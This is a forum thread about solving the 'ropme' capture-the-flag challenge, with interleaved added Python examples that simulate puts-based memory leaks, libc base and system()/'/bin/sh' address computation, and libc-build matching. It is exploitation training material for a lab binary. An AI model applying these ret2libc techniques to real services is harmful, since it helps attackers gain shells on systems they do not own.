ropme

I was able to do everything except make it reopen stdin again …
I managed to leak function@libc and got the libc offsets.
Do I really need to reopen stdin again to send the new payload, or am I missing something?
Can you please DM me?

Interesting challenge … thanks to @game0ver and the @ippsec videos I was able to solve it
with a good understanding of the challenge …
Hint: use pwntools, it’s very handy.

Hi all, sorry for my English. I got a /bin/sh shell on my local machine with ASLR on;
how can I get sh_offset and system_offset on the remote server?

@gavz You have to leak a function’s address somehow and then you can easily compute the libc base address. In this thread there is some information about how you can compute the libc base address from a leak.

@game0ver said:
@gavz You have to leak a function’s address somehow and then you can easily compute the libc base address. In this thread there is some information about how you can compute the libc base address from a leak.

Thanks a lot, I solved this challenge.

@BitTheByte said:
Interesting challenge … thanks to @game0ver and the @ippsec videos I was able to solve it
with a good understanding of the challenge …
Hint: use pwntools, it’s very handy.

@BitTheByte Can you post a reference to the videos here? Because that fgets does not want to keep stdin open …

I now have a locally working exploit, and could also finally figure out the libc version on the remote server. The problem now is that although I’m definitely hitting system on the remote server, I’m still not able to hit /bin/sh: the address I’m using for ‘/bin/sh’ is pointing to a random string and therefore returning command not found!

I even tried to dump the whole libc binary from the remote server and search it for ‘/bin/sh’, but my script is extremely faulty due to puts behaviour with null bytes, I guess.

Any clue about what I should be looking for?
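The dumping problem described in the post above comes from puts() stopping at the first NUL byte. The following is an added example, not code from this thread or from any poster: it simulates a puts()-style leak over a constructed memory image (REMOTE_BASE and REMOTE_IMAGE are made up for the example) and shows how to rebuild a region byte-for-byte by treating every empty reply as a NUL and skipping the terminator puts swallowed.

```python
# Added example (not from the thread): reconstructing a region of remote memory
# through a puts()-based leak, which stops at the first NUL byte.
#
# puts() prints bytes up to the first 0x00 and then a newline, so one leak of
# an address returns a variable number of bytes, and an empty line means the
# byte at that address is 0x00. To dump a region we walk it one leak at a
# time, write one NUL for every empty reply, and advance past the terminator
# that puts did not send.

# Constructed stand-in for the remote libc mapping (hypothetical base address;
# the bytes are made up for this example and are not a real ELF).
REMOTE_BASE = 0x7f1234567000
REMOTE_IMAGE = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    + b"\x03\x00\x3e\x00\x01\x00\x00\x00"
    + b"/bin/sh\x00-c\x00exit 0\x00"
)


def puts_leak(addr: int) -> bytes:
    """Simulates what a puts(addr) leak returns on the wire: the bytes up to
    the first NUL, without the NUL itself (trailing newline already stripped).
    In a real exploit this is the recvline() result of one ROP round trip."""
    off = addr - REMOTE_BASE
    if not 0 <= off < len(REMOTE_IMAGE):
        raise ValueError(f"address {addr:#x} is outside the simulated mapping")
    chunk = REMOTE_IMAGE[off:]
    end = chunk.find(b"\x00")
    return chunk if end == -1 else chunk[:end]


def dump_region(leak, start: int, length: int) -> bytes:
    """Rebuild `length` bytes starting at `start` using a puts-style leak.

    Each call returns data up to a NUL. An empty reply means the byte at the
    current address is itself NUL, so we record 0x00 and move on by one; a
    non-empty reply is copied, the NUL that stopped puts is appended, and the
    cursor jumps past it. The number of round trips equals the number of NUL
    bytes in the region, which is why dumping a whole libc this way is slow."""
    out = bytearray()
    addr = start
    while len(out) < length:
        chunk = leak(addr)
        if not chunk:
            out.append(0)          # byte at addr was the terminator itself
            addr += 1
        else:
            out += chunk
            out.append(0)          # puts stopped here: the next byte is NUL
            addr += len(chunk) + 1
    return bytes(out[:length])


if __name__ == "__main__":
    dumped = dump_region(puts_leak, REMOTE_BASE, len(REMOTE_IMAGE))
    print(dumped == REMOTE_IMAGE, dumped.find(b"/bin/sh\x00"))
```

The only subtlety is distinguishing "puts printed nothing" from "the connection closed": with pwntools, `recvline()` on an empty puts output returns `b"\n"`, so strip exactly one newline before deciding the reply was empty, and treat an EOF as a failed leak rather than as a NUL byte.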

I actually got it 10 minutes after posting the comment above lol. If someone else is having the same trouble, note that ‘/bin/sh’ is just a string, not a function; therefore it can be grabbed from anywhere in memory (not necessarily libc, even a non-executable part of memory would work) and will still be a valid argument for system().
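The two points made earlier in this thread (compute the libc base from a leaked function address, and use any NUL-terminated "/bin/sh" or "sh" string as the argument to system()) together, as an added example that is not code from any poster. Everything in it is constructed: LIBC_OFFSETS are hypothetical symbol offsets, not real libc values, and LIBC_IMAGE / BINARY_IMAGE / BINARY_BASE are stand-ins for a local copy of the remote libc and for the main binary's mapping.

```python
import struct

# Added example (not from the thread). Turns a puts()-based leak of a libc
# function into a libc base and a system()/"/bin/sh" pair, with the checks
# that catch the mistakes discussed above. All offsets and images are
# constructed for the example and are not real libc values.

LIBC_OFFSETS = {"puts": 0x6f690, "system": 0x45390}   # hypothetical offsets

# Constructed stand-in for the local copy of the remote libc.
LIBC_IMAGE = (
    b"\x00" * 0x100 + b"/bin/sh\x00" + b"\x00" * 0x40 + b"/bin/sh -c\x00"
)
# Constructed stand-in for the main binary's mapping; a string here is as
# good an argument to system() as one inside libc.
BINARY_BASE = 0x400000
BINARY_IMAGE = b"\x7fELF" + b"\x00" * 0x1c + b"cat flag.txt\x00" + b"sh\x00"


def parse_leak(line: bytes) -> int:
    """puts() prints a canonical x86-64 pointer as 6 bytes (it stops at the
    first NUL, and the top two bytes are zero) followed by a newline. Pad to
    8 bytes before unpacking. Fewer than 6 bytes usually means the pointer
    itself contained a NUL, and the parsed value is then truncated."""
    raw = line.rstrip(b"\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaked: int, symbol: str) -> int:
    base = leaked - LIBC_OFFSETS[symbol]
    # libc is mapped at a page-aligned address, so an unaligned result means
    # the leak or the offset table belongs to a different libc build. (A
    # wrong build whose offset differs by a multiple of 0x1000 slips past
    # this check; verify a second symbol in that case.)
    if base & 0xfff:
        raise ValueError(f"base {base:#x} is not page aligned: wrong libc?")
    return base


def find_sh_string(regions) -> list:
    """Search every (base, image) pair for a NUL-terminated '/bin/sh', then
    for a bare 'sh'. Returns absolute addresses. system() hands the string
    to /bin/sh -c, so it only needs a NUL-terminated command, not a pointer
    into libc specifically."""
    hits = []
    for base, image in regions:
        for needle in (b"/bin/sh\x00", b"sh\x00"):
            off = image.find(needle)
            while off != -1:
                hits.append(base + off)
                off = image.find(needle, off + 1)
    return hits


def plan(leak_line: bytes, libc_image: bytes, extra_regions=()):
    """From one puts leak, return (libc_base, system_addr, sh_candidates)."""
    base = libc_base(parse_leak(leak_line), "puts")
    system = base + LIBC_OFFSETS["system"]
    regions = [(base, libc_image)] + list(extra_regions)
    candidates = find_sh_string(regions)
    if not candidates:
        raise LookupError("no NUL-terminated sh string in any known mapping")
    return base, system, candidates


if __name__ == "__main__":
    # Constructed leak line: puts() output for address 0x7ffff7a7c690.
    base, system, cands = plan(b"\x90\xc6\xa7\xf7\xff\x7f\n", LIBC_IMAGE,
                               [(BINARY_BASE, BINARY_IMAGE)])
    print(hex(base), hex(system), [hex(c) for c in cands])
```

Before firing the final chain, leak the chosen candidate address with the same puts primitive and confirm the reply is "/bin/sh" (or "sh"); the "command not found" symptom described above is exactly what you get when the offset table and the remote libc disagree and the address lands on some other string.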

Actually had it all right on the first try and wasted ages trying to fix it because of that ■■■■ /bin/sh offset.

Anyone know why our string isn’t waiting for us there? Is that actually part of the challenge?

For those of you that cannot find /bin/sh where you would expect it, have a look at the libc magic gadget

I’m pretty certain I found the correct libc and it runs sh, but
I’m a big dumb dumb! I see what the issue is: I’m not actually running what I think. Similar to lots of issues already above.

@alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

Maybe 2 years ago the right libc was in this database. But now it isn’t. Anyway, the challenge may be completed without the right libc :)

@alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

You are a hero.

Hi guys) I have two questions:

  1. I followed the approach from the ippsec bitterman video and developed the exploit. This exploit also works on the Ellingson box and gives a shell. But it doesn’t give a shell in this challenge, even locally on my Kali box! I get the “Got EOF while reading in interactive” error. What am I missing? PM, please :(
  2. I understand how to pwn the binary, but I can’t understand how to pwn the remote web service :( Where should I place my payload? In the body of a POST request? Or in the URI of a GET request? Or where? Any hints really appreciated :)

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.


@mkt said:

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.

I don’t have a VIP subscription, so I can’t start the retired challenge, but if you want, I can take a look at what you tried (and compare it to my notes/script).

I figured out why the leak only returns EOF and the solution for it. PM me for hint if you’re stuck the same way that I was.

For those who are doing the challenge but don’t wanna spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don’t get foolishly stuck like I did. In any case, you understand what you’re doing and it’s not your fault.

Here you can get it (since this is retired content I guess I can do this):

Please, be careful. Don’t install anything, just unpack it and find the file you’re looking for.

@lobo09 said:

For those who are doing the challenge but don’t wanna spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don’t get foolishly stuck like I did. In any case, you understand what you’re doing and it’s not your fault.

Here you can get it (since this is retired content I guess I can do this):
2.23-0ubuntu11 : libc6 : amd64 : Xenial (16.04) : Ubuntu

For anyone working on this… I first looked in https://libc.blukat.me/ to find the version and as @lobo09 mentioned it’s not there. Then I saw mention of a GitHub libc-database. Lucky for me, they are hosting it at https://libc.rip/

It took half a dozen tries to find the right library, but it’s there. The 2.23-0ubuntu11 one didn’t work on my instance.

John Hammond and IppSec have some great videos on YouTube using PwnTools for an exploit like this. They won’t show you this exact challenge but rather the workflow.
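The libc-database / libc.rip lookup discussed in the last few posts rests on one fact: libc is mapped at a page-aligned base, so the low 12 bits of a leaked address equal the low 12 bits of that symbol's offset in the file, and several leaks can be matched against a table of known builds without knowing the base. The following is an added example of that matching rule, not libc-database's own code: CANDIDATE_LIBCS is a constructed table with made-up offsets (the names are labels, not real package identifiers), and the leaked addresses in the usage are constructed too. Beyond the low-12-bit rule, it also requires every leaked symbol to imply the same base, which rejects lookalike builds that a bit-mask match alone would accept.

```python
# Added example (not from the thread, and not libc-database's own code): the
# low-12-bit matching rule behind libc-offset lookup tools, plus a stricter
# consistency check. The table below is constructed; its offsets are not
# real libc values.

CANDIDATE_LIBCS = {
    # two entries with identical offsets: the same build shipped twice, which
    # is why a lookup often returns several names that are all "right"
    "libc-A":          {"puts": 0x6a5b0, "gets": 0x69c20, "system": 0x41e70},
    "libc-A-repack":   {"puts": 0x6a5b0, "gets": 0x69c20, "system": 0x41e70},
    # same low 12 bits for puts and gets as libc-A, but a different distance
    # between them, so it is a different build
    "libc-lookalike":  {"puts": 0x7b5b0, "gets": 0x6ac20, "system": 0x4e440},
    # unrelated build: low 12 bits do not match at all
    "libc-B":          {"puts": 0x82a30, "gets": 0x81fb0, "system": 0x52fe0},
}


def match_libc(leaks: dict, table: dict, require_consistent_base: bool = True) -> list:
    """leaks maps symbol name -> leaked absolute address.

    A build matches when, for every leaked symbol, the low 12 bits of the
    address agree with the low 12 bits of the build's offset. With
    require_consistent_base (the default) every symbol must additionally
    imply the same page-aligned base, i.e. the distances between the leaked
    symbols must equal the distances in the file. Returns a list of
    (name, sorted candidate bases)."""
    matches = []
    for name, offsets in table.items():
        bases = []
        for sym, addr in leaks.items():
            off = offsets.get(sym)
            if off is None or (addr & 0xfff) != (off & 0xfff):
                break
            bases.append(addr - off)
        else:
            distinct = sorted(set(bases))
            if len(distinct) == 1 or (distinct and not require_consistent_base):
                matches.append((name, distinct))
    return matches


def resolve(name: str, base: int, symbol: str, table: dict = CANDIDATE_LIBCS) -> int:
    """Absolute address of `symbol` once a build and its base are chosen."""
    return base + table[name][symbol]


if __name__ == "__main__":
    # Constructed leaks for a process whose (unknown to us) libc base is
    # 0x7f3a1c2d4000 and whose libc is libc-A.
    leaks = {"puts": 0x7f3a1c33e5b0, "gets": 0x7f3a1c33dc20}
    print(match_libc(leaks, CANDIDATE_LIBCS))
    print(match_libc(leaks, CANDIDATE_LIBCS, require_consistent_base=False))
    print(match_libc({"puts": leaks["puts"]}, CANDIDATE_LIBCS))
```

With only one leaked symbol the lookalike build survives, which mirrors the half-dozen tries reported above: leak two or three functions before trusting a match, and when several names remain, they usually share the offsets you need anyway.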